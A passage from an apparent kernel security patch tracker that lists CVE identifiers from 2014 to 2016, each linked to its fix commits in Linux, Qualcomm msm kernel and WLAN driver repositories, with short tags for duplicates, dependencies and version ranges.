https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=96a62c1de93a44e6ca69514411baf4b3d67f6dee -CVE-2014-9879 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=ecc8116e1befb3a764109f47ba0389434ddabbe4 -CVE-2014-9880 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=f2a3f5e63e15e97a66e8f5a300457378bcb89d9c -CVE-2014-9881 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=ba3f404a10b3bb7e9c20440837df3cd35c5d0c4b -CVE-2014-9882 - Dupe - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=3a4ebaac557a9e3fbcbab4561650abac8298a4d9 - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=0f6afe815b1b3f920f3502be654c848bdfe5ef38 -CVE-2014-9883 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=cbf79a67348e48557c0d0bb9bc58391b3f84bc46 -CVE-2014-9884 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=f4948193c46f75e16d4382c4472485ab12b7bd17 -CVE-2014-9885 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=a1d5a4cbd5aa8656bc23b40c7cc43941e10f89c3 -CVE-2014-9886 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=80be0e249c906704085d13d4ae446f73913fc225 -CVE-2014-9887 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=b1bc773cf61265e0e3871b2e52bd6b3270ffc6c3 -CVE-2014-9888 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=f044936caab337a4384fbfe64a4cbae33c7e22a1 -CVE-2014-9889 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit?id=f4e2f2d4ef58c88340774099dff3324ec8baa24a -CVE-2014-9890 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=14e0c8614d2715589583d8a95e33c422d110eb6f -CVE-2014-9891 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=c10f03f191307f7114af89933f2d91b830150094 -CVE-2014-9892 - Link - 
https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=591b1f455c32206704cbcf426bb30911c260c33e -CVE-2014-9893 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=bfc6eee5e30a0c20bc37495233506f4f0cc4991d -CVE-2014-9894 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=83214431cd02674c70402b160b16b7427e28737f -CVE-2014-9895 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=cc4b26575602e492efd986e9a6ffc4278cee53b5 -CVE-2014-9896 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=89f2bcf1ac860b0b380e579e9a8764013f263a7d -CVE-2014-9897 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=46135d80765cb70a914f02a6e7b6abe64679ec86 -CVE-2014-9898 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm-3.10/commit/?id=80be0e249c906704085d13d4ae446f73913fc225 -CVE-2014-9899 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=8756624acb1e090b45baf07b2a8d0ebde114000e -CVE-2014-9900 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=63c317dbee97983004dffdd9f742a20d17150071 -CVE-2014-9901 - Link - prima - https://us.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=637f0f7931dd7265ac1c250dc2884d6389c66bde -CVE-2014-9902 - Link - prima - https://us.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=3b1c44a3a7129dc25abe2c23543f6f66c59e8f50 - Link - prima - https://us.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/prima/commit/?id=3b1c44a3a7129dc25abe2c23543f6f66c59e8f50 -CVE-2014-9903 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4efbc454ba68def5ef285b26ebfcfdb605b52755 -CVE-2014-9904 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6217e5ede23285ddfee10d2e4ba0cc2d4c046205 -CVE-2014-9914 - Link - 
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9709674e68646cee5a24e3000b3558d25412203a -CVE-2014-9922 - Depends - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=69c433ed2ecd2d3264efd7afec4439524b319121 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/48a6c91c1d967cc8375621509676a9eabfac5777 - Link - 3.10 - https://github.com/aosp-mirror/kernel_msm/commit/57bc19ec472ab303209b2d96a59a619c5221594d -CVE-2014-9940 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=60a2362f769cf549dc466134efe71c8bf9fbaaba -CVE-2015-3636 - Link - https://github.com/torvalds/linux/commit/a134f083e79f -CVE-2015-0569 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=a079d716b5481223f0166c644e9ec7c75a31b02c - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=0ffca4f7bca3a8157d8dbaddbcea292c267fb5aa -CVE-2015-0570 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=8bd73c3452ab22ba9bdbaac5ab12de2ed25fcb9d - Link - prima - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/prima/commit/?id=606babd474290e84e5a86f94480f62f4a5ff92ac -CVE-2015-0571 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=6feb2faf80a05940618aa2eef2b62e4e2e54f148 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=fe4208157c899a5de4d6769d13f6620fc32ebfa9 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=0e53a89bfe0dbb50e0dde9a6960d274386247cd9 - Link - qcacld-2.0 - 
https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=88ce639e7a0bba852f193b6f53b7ca1926a09b02 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=0858d21caf17d56f8d2353590c1ec245073222e0 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=2905578424256be07e6b9d8c63bb83d40cc52a71 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=be62ecde85228b91c66fb047e27d25132f56bd0d - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=aaeeed43f9597631982835481c7cf2621f6455f0 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=6642bccf3ed8cba176dee7d4bbc21fc4580efb7b - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=6665a9697b404acf4d2e7d52d9c2b19512c9b239 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=9eeafd788f53cc37c169b299f91ca9c558b228f9 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=55bdc6d1c88a100dc4a71bf855b69db522c9b5b5 - Link - qcacld-2.0 - https://www.codeaurora.org/cgit/quic/la//platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=fb9fb202c71547dba648c9b08d97645c6f42ca6e -CVE-2015-0572 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=34ad3d34fbff11b8e1210b9da0dac937fb956b61 -CVE-2015-0573 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.10.git;a=commit;h=e20f20aaed6b6d2fd1667bad9be9ef35103a51df -CVE-2015-1420 - Link - 3.2-^3.19 - 
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=8dfc8b9e8432f50606820b40a7d63618d9d61a07 -CVE-2015-1465 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=df4d92549f23e1c037e83323aff58a21b3de7fe0 -CVE-2015-1534 - Link - https://android.googlesource.com/kernel/msm/+/b3226d8ea5a2d968b1a841fc54b48f5ebdb16846 -CVE-2015-1593 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4e7c22d447bb6d7e37bfe39ff658486ae78e8d77 -CVE-2015-1805 - Link - 3.4 - https://android.googlesource.com/kernel/common/+/f7ebfe91b806501808413c8473a300dff58ddbb5 - Link - 3.10 - https://android.googlesource.com/kernel/common/+/4a5a45669796c5b4617109182e25b321f9f00beb - Link - 3.14 - https://android.googlesource.com/kernel/common/+/bf010e99c9bc48002f6bfa1ad801a59bf996270f - Link - 3.16 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=a39bf4a8e29c7336c0c72652b7d0dd1cd1b13c51 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=637b58c2887e5e57850865839cc75f59184b23d1 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f0d1bec9d58d4c038d0ac958c9af82be6eb18045 -CVE-2015-2041 - Link - 3.2 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=88fe14be08a475ad0eea4ca7c51f32437baf41af - Link - ^3.19 - https://github.com/torvalds/linux/commit/6b8d9117ccb4f81b1244aafa7bc70ef8fa45fc49 -CVE-2015-2686 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4de930efc23b92ddf88ce91c405ee645fe6e27ea -CVE-2015-2922 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6fd99094de2b83d1d4c8457f2c83483b2828e75a -CVE-2015-3288 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6b7339f4c31ad69c8e9c0b2859276e22cf72176d -CVE-2015-3339 - Link - 3.2 - 
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=470e517be17dd6ef8670bec7bd7831ea0d3ad8a6 - Link - ^3.19 - https://github.com/torvalds/linux/commit/8b01fc86b9f425899f8a3a8fc1c47d73c2c20543 -CVE-2015-4170 - Link - 3.10^ - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cf872776fc84128bb779ce2b83a37c884c3203ae -CVE-2015-4177 - Link - 4.0 - https://github.com/torvalds/linux/commit/cd4a40174b71acd021877341684d8bb1dc8ea4ae -CVE-2015-5364 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=beb39db59d14990e401e235faf66a6b9b31240b0 -CVE-2015-5366 - Link - 3.10 - https://review.lineageos.org/163292 - Link - 3.18 - https://review.lineageos.org/170669 - Link - ^4.9 - http://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/commit/?id=dfb4357da6ddbdf57d583ba64361c9d792b0e0b1 -CVE-2015-5697 - Link - ^4.1 - https://github.com/torvalds/linux/commit/b6878d9e03043695dbf3fa1caa6dfc09db225b16 -CVE-2015-5706 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f15133df088ecadd141ea1907f2c96df67c729f0 -CVE-2015-5707 - Depends - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=451a2886b6bf90e2fb378f7c46c655450fb96e81 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fdc81f45e9f57858da6351836507fbcf1b7583ee -CVE-2015-6619 - Link - https://android.googlesource.com/device%2Fhtc%2Fflounder-kernel/+/25d3e5d71865a7c0324423fad87aaabb70e82ee4 -CVE-2015-6640 - Link - https://android.googlesource.com/kernel%2Fcommon/+/69bfe2d957d903521d32324190c2754cb073be15 -CVE-2015-6642 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.18/commit/?id=4ad825ba2968666069740c3e80fe31ed3d0e29ba -CVE-2015-7509 - Link - ^3.7 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c9b92530a723ac5ef8e352885a1862b18f31b2f5 -CVE-2015-7515 - Link - 3.2 - 
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=90eb3c037fe3f0f25f01713a92725a8daa2b41f3 - Link - ^4.4 - https://github.com/torvalds/linux/commit/8e20cf2bce122ce9262d6034ee5d5b76fbb92f96 -CVE-2015-7550 - Link - ^4.3 - https://github.com/torvalds/linux/commit/b4a1b4f5047e4f54e194681125c74c0aa64d637d -CVE-2015-7872 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f05819df10d7b09f6d1eb6f8534a8f68e5a4fe61 -CVE-2015-8019 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/patch/?id=813658e0c448f2f5fb3301762076ba5e0f61411c - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/patch/?id=f1c121b78e68c03f7fe5e9fa7319e53ad29392f3 - Link - 4.3 - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/patch/?id=197c949e7798fbf28cfadc69d9ca0c2abbf93191 -CVE-2015-8539 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=096fe9eaea40a17e125569f9e657e34cdb6d73bd -CVE-2015-8543 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=79462ad02e861803b3840cc782248c7359451cd9 -CVE-2015-8575 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5233252fce714053f0151680933571a2da9cbfb4 -CVE-2015-8785 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3ca8138f014a913f98e6ef40e939868e1e9ea876 -CVE-2015-8830 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4c185ce06dca14f5cea192f5a2c981ef50663f2b - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a70b52ec1aaeaf60f4739edb1b422827cb6f3893 -CVE-2015-8839 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ea3d7209ca01da209cda6f0dea8be9cc4b7a933b - Link - https://github.com/aosp-mirror/kernel_msm/commit/f0ac071fc6660c1d8d4b0d0dbe7642dd1274e4a5 -CVE-2015-8937 - Link - 
https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=c66202b9288cc4ab1c38f7c928fa1005c285c170 -CVE-2015-8938 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=51c39420e3a49d1a7f05a77c64369b7623088238 -CVE-2015-8939 - Link - https://us.codeaurora.org/cgit/quic/la/kernel/msm/commit/?id=884cff808385788fa620833c7e2160a4b98a21da -CVE-2015-8940 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=e13ebd727d161db7003be6756e61283dce85fa3b -CVE-2015-8941 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=d4d4d1dd626b21e68e78395bab3382c1eb04877f -CVE-2015-8942 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=9ec380c06bbd79493828fcc3c876d8a53fd3369f -CVE-2015-8943 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm/commit/?id=ad376e4053b87bd58f62f45b6df2c5544bc21aee -CVE-2015-8944 - Link - https://us.codeaurora.org/cgit/quic/la//kernel/msm-3.10/commit/?id=e758417e7c31b975c862aa55d0ceef28f3cc9104 -CVE-2015-8950 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=6e2c437a2d0a85d90d3db85a7471f99764f7bbf8 -CVE-2015-8951 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=ccff36b07bfc49efc77b9f1b55ed2bf0900b1d5b - Link - 3.18 - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.18.git;a=commit;h=0aed2b7e739f7e528ffd8dac3c0c14deb82c9acf -CVE-2015-8955 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=8fff105e13041e49b82f92eef034f363a6b1c071 -CVE-2015-8961 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=6934da9238da947628be83635e365df41064b09b -CVE-2015-8962 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=f3951a3709ff50990bf3e188c27d346792103432 -CVE-2015-8963 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=12ca6ad2e3a896256f086497a7c7406a547ee373 
-CVE-2015-8964 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=dd42bf1197144ede075a9d4793123f7689e164bc -CVE-2015-8966 - Link - 3.15+ - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=76cc404bfdc0d419c720de4daaf2584542734f42 -CVE-2015-8967 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c623b33b4e9599c6ac5076f7db7369eb9869aa04 -CVE-2015-9004 - Link - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=c3c87e770458aa004bd7ed3f29945ff436fd6511 -CVE-2016-0723 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=5c17c861a357e9458001f021a7afa7aab9937439 -CVE-2016-0728 - Link - 3.10 - https://android.googlesource.com/kernel/common/+/9fc5f368bb89b65b591c4f800dfbcc7432e49de5 - Link - 3.14 - https://android.googlesource.com/kernel/common/+/93faf7ad3d603c33b33e49318e81cf00f3a24a73 - Link - 3.18 - https://android.googlesource.com/kernel/common/+/ba8bb5774ca7b1acc314c98638cf678ce0beb19a - Link - 4.1 - https://android.googlesource.com/kernel/common/+/8a8431507f8f5910db5ac85b72dbdc4ed8f6b308 -CVE-2016-0758 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=23c8a812dc3c621009e4f0e5342aa4e2ede1ceaa -CVE-2016-0774 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/fs/pipe.c?id=b381fbc509052d07ccf8641fd7560a25d46aaf1e -CVE-2016-0801 - Link - https://android.googlesource.com/kernel/msm/+/68cdc8df1cb6622980b791ce03e99c255c9888af -CVE-2016-0802 - Link - https://android.googlesource.com/kernel/msm/+/3fffc78f70dc101add8b82af878d53457713d005 -CVE-2016-0805 - Link - https://github.com/android/kernel_msm/commit/b3f0b1f694258b3b3debc5256eec94bb2a9eb454 -CVE-2016-0806 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=1fac73337080712109029302599945d1ac36c799 - Link - prima - 
https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=e9dcd5aa01734b019c793220531e4ef1d82959f8 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=fd13b59e5a75b761f68fe34f09df1dce7a49acc2 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=fbb8f120ee729d47869f0bebe5bc31e83bcf2876 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=518fd80981eefa9715e0851260b2c7aeb86551d7 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=86fd66a451b2549f990b71013220e0a3f46b5a00 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=4a75c965d2505ca2490a365a27309cc9dd68b2d1 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=ede034fd604a9cdb20eb7accdaec4a8e70ffac41 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=aaf7476fa7fdc8d1865f20217c7c57ce561e03f7 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=973503f0d411e13e01fa10c5ea802dcb8a12cf85 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=34953f9f66d9cd36616c5271a7d285b31d9142c2 - Link - prima - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-flo-3.4-marshmallow-mr2&id=72d3908cc1bcb075015f1b86001f4292ac41d38a - Link - qcacld-2.0 - 
https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=055561f40f2baa5cdd74f952be55b61a3907279a - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=f31e58289c8ebded58ffe1d4709e2f878765b0a6 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=255dd931573beb3afca15909f483f26db22a5c98 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=d4b451bd06ad53ed785cbda4272c54788b1537d4 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=2882941530cbf804e280f235f7f8d76179a423fe - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=825827ab2aa271f23f48aa683046a3aa3f7fe90e - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=27d3007a7635ccca7ae9bfb98c89724652dcbc3b - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=89c3372735486a2f7f6b35298fcf246e7e177ac0 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=e2addf5aa2c7dfc537c2b80d8cc1cb5640346535 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=e474427496ccb784878e10978f25b6e85de68850 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=967f88782e93809cfb27a60b82a3a069d2a52fc4 - Link - qcacld-2.0 - 
https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=2f7ecc8b88843b3b53bd7d2328f0d53f3794f456 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=9fd4483e08349eb1570c42da8acbac33e70a6e02 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=fb3616763bd5909e86cddd19f3569a26b4f93f49 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=ca7c085fb70861a55d9d3a46de012a3e0998ca61 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?h=caf/aosp-new/android-msm-bullhead-3.10-nougat-mr2&id=f66afdc6840e7647a965487194873826de57e655 -CVE-2016-0819 - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=e32c1b1a3d368afe1b09e81b3087ab8810282e93 -CVE-2016-0821 - Link - https://github.com/torvalds/linux/commit/8a5e5e02fc83aaf67053ab53b359af08c6c49aaf -CVE-2016-0823 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=ab676b7d6fbf4b294bf198fb27ade5b0e865c7ce -CVE-2016-0843 - Link - https://www.codeaurora.org/gitweb/quic/la/?p=kernel/msm-3.10.git;a=commit;h=a599a7a83745820b3e1bee9d4b625bd54337e4d0 -CVE-2016-0844 - Link - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=90a9da2ea95e86b4f0ff493cd891a11da0ee67aa -CVE-2016-10044 - Link - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=22f6b4d34fcf039c63a94e7670e0da24f8575a5a - Link - https://android.googlesource.com/kernel/msm/+/689ea150ab61cb193268d4b7f68de68acf207db4 - Link - https://android.googlesource.com/kernel/msm/+/bc02d1d9f5d0e0610504c24b05fef54726ba1a1b -CVE-2016-10088 - Link - http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=128394eff343fc6d2f32172f03e24829539c5835 
-CVE-2016-10153 - Link - 4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=a45f795c65b479b4ba107b6ccde29b896d51ee98 -CVE-2016-10154 - Link - 4.9 - https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=06deeec77a5a689cc94b21a8a91a76e42176685d -CVE-2016-10200 - Link - https://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=32c231164b762dddefa13af5a0101032c70b50ef -CVE-2016-10208 - FIXME - Link - 3.10-^3.16 - https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?h=v3.16.44&id=cde863587b6809fdf61ea3c5391ecf06884b5516 -CVE-2016-10229 - Link - http://git.kernel.org/cgit/linux/kernel/git/stable/linux-stable.git/commit/?id=197c949e7798fbf28cfadc69d9ca0c2abbf93191 -CVE-2016-10230 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=bd9a8fc6d7f6bd1a0b936994630006de450df657 -CVE-2016-10231 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=3bfe5a89916f7d29492e9f6d941d108b688cb804 -CVE-2016-10232 - Link - 3.10 - https://source.codeaurora.org/quic/la//kernel/msm-3.10/commit/?id=21e0ead58e47798567d846b84f16f89cf69a57ae - Link - 3.18 - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=27f7b3b3059f6181e2786f886f4cd92f413bc30c -CVE-2016-10233 - Link - https://source.codeaurora.org/quic/la/kernel/msm/commit/?id=d793c6d91ecba2a1fd206ad47a4fd408d290addf -CVE-2016-10234 - Link - 3.10 - https://source.codeaurora.org/quic/la/kernel/msm-3.10/commit/?id=c7d7492c1e329fdeb28a7901c4cd634d41a996b1 - Link - 3.18 - https://source.codeaurora.org/quic/la/kernel/msm-3.18/commit/?id=d12370c7f3ecded1867fbd6b70ded35db55cab1d -CVE-2016-10235 - Link - qcacld-2.0 - https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=5bb0059243515ecdac138cfdb4cee7259bbd0bbc -CVE-2016-10236 - Link - https://source.codeaurora.org/quic/la//kernel/msm-3.18/commit/?id=b8199c2b852f1e23c988e10b8fbb8d34c98b4a1c 
